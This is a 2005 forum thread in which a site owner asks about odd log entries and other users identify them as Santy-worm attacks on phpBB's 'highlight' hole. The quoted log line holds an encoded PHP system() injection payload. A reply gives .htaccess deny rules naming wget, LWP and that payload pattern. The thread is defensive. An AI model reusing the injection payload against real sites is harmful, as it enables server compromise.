Is this code a forum attack of some sort?

[kiwi li]

I've been checking my logs during the past day or so and I've been recieving hundreds upon hundreds of bad URLs, I've included a few below, but I don't know what these people are trying to accomplish...

66.118.187.66 - - [27/Sep/2005:01:39:02 -0500] "GET /lom/viewtopic.php?p=195&highlight=%2527%252E system(chr(112)%252Echr(101)%252Echr(114 )%252Echr(108)%252Echr(32)%252Echr(45)%2 52Echr(101)%252Echr(32)%252Echr(34)%252E chr(112)%252Echr(114)%252Echr(105)%252Ec hr(110)%252Echr(116)%252Echr(32)%252Echr (113)%252Echr(40)%252Echr(106)%252Echr(8 3)%252Echr(86)%252Echr(111)%252Echr(119) %252Echr(77)%252Echr(115)%252Echr(100)%2 52Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 404 665 "-" "Mozilla/4.0"

edited to save post space, deleted the other IP address logs

[Vin DSL]

Someone is trying to hack your board with the highlight hole...

[kiwi li]

I guess I'm lucky I took the board offline then? ^^ Sounds evil... ^^

I'm guessing what they're doing is automated though because I see hundreds of different IPs and they're all hitting me with the same code at once? ^^

And since the board doesn't exist, (that board stopped existing since Feburary) they're eating my 404.jpg file... maybe I should take it off for the time being... ^^;;

Thank you for your help again! ^_^

[Vin DSL]

Hrm...

Well, I'm just guessing. I haven't got much to go by...

Are these worms eating up your bandwidth by any chance?

[Vin DSL]

Just for the heck of it, I looked at my logs, and I haven't been bombed by worms in a long time. You might consider putting this in your .htaccess file -- it's what I use...

Code:

#Check for Santy Worms, et cetera, and redirect to a PHANTOM site.
#Variant-1 May cause problems with CRON jobs set from cPanel.
RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
#Variant-2 No reported problems.
RewriteCond %{REQUEST_URI} ^visualcoders                [NC,OR]
#Variant-3 No reported problems.
RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR]
#Variant-4 May cause problems with cPanel updates, et cetera.
RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC,OR]
#variant-5 Redirect all inner http:// requests.
RewriteCond %{QUERY_STRING} ^(.*)http://(.*)            [NC,OR]
#variant-6 Redirect all inner http requests even if encoded.
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*)      [NC,OR]
#variant-7 Prevent access from santy webworm a-e.
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527       [NC,OR]
#variant-8 Prevent pre php 4.3.10 bug.
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b    [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L]

Evidently it's still effective!

[Gwaihir]

That "highlight hole" was a problem with phpBB. It was fixed with version 2.0.15 if I recall correctly. Just don't put any phpBB of a version older than that out and you haven't got anything to worry about, it will simply blow over.

That is: unless you are really, really thight on bandwith: with a lot of (blocking) effort you could save a bit.

[kiwi li]

Well, I had a 404 error jpg I was showing that was 120KBs and I think I roughly got about 200-300 bad hits on there, so I think they would at max have eaten 360MBs? I don't really mind since I never reached my maximum limit anyways... it's only 25GB used this month and it's almost the new month already. ^^

Yah... I don't think I'll be using phpBB, or any other messageboard for that matter since I don't really have the time to update it... ^^ Too many exams... >.<

Thank you for the code, I'll go try it out! ^_^

[Vin DSL]

I don't really mind since I never reached my maximum limit anyways... it's only 25GB used this month and it's almost the new month already. ^^

Yeah, but I'm sure JagPC, et al, would appreciate if 'we' stopped malicious attacks against 'our' web sites. They can't catch them all...

I know a guy that got hammered by worms to a tune of 300MB an hour. If enough sites are being attacked here, it WILL effect the whole network, you know?

[Spathiphyllum]

Well, I had a 404 error jpg I was showing that was 120KBs and I think I roughly got about 200-300 bad hits on there, so I think they would at max have eaten 360MBs?

In the grand scheme, this amount of bandwidth is not too extreme. However, it is still inefficient and wasteful. Surely the image can be reduced in size, the 404 HTML reformatted, or a simplified response file presented. After all it is just a "File Not Found" error and is more of a housecleaning issue than a front page facade.

Amazingly, Vin is right here too.

[kiwi li]

That's because the 404 error is the only thing on my website... ^^;;;;;;;;;;;;;;;;;; It's like giving away free money to someone... ^^;;;;

And, I have already changed the 404 image to 20kbs even before I started this thread!

I don't know how to stop malicious attacks... ^^ That's why I have to post here or write that help ticket to jaguarpc.... although I think that they would probably catch it as well... ^^ I think...

Hmm... maybe I should make my 404 error larger.... maybe a mosaic format... ¬.¬

300 MBs an hour is alot... ^^ Is there a worm that downloads everything or something like that?

[Spathiphyllum]

And, I have already changed the 404 image to 20kbs even before I started this thread!

That's a good start.

I don't know how to stop malicious attacks... ^^ That's why I have to post here or write that help ticket to jaguarpc.

Keep providing info and eventually we'll stumble upon a reasonable solution. One thing you could try temporarily until a good block can be applied is to define a response in the top level .htaccess directive context file:

Code:

ErrorDocument 404 "<html><body><p>404 - File Not Found<br />\
(Please visit <a href=http://www.kiwili.com/>www.kiwili.com</a>.)</p></body></html>

This will provide the appropriate 404 response using a small amount of both user and machine readable text as well as provide an acceptable response page for search engines. You can modify that text string to suit your needs. Copy those two lines and place them in the .htaccess file (exactly as written at first during testing). Next, visit your own site at http://www.kiwili.com/this_is_a_test.html (substituting your proper domain name, of course) and watch what happens. Simple. Edit as desired but terminate all lines except the last quoted line with the backslash "\" character. It should look like this in your browser:

Code:

404 - File Not Found
(Please visit www.kiwili.com.)

Is there a worm that downloads everything or something like that?

A worm could be revisiting your site repeatedly and, failing to find the desired file, searches again and again. Or it could be a script searching for vulnerabilities. I occassionally get those and report them to the ISP or webhost.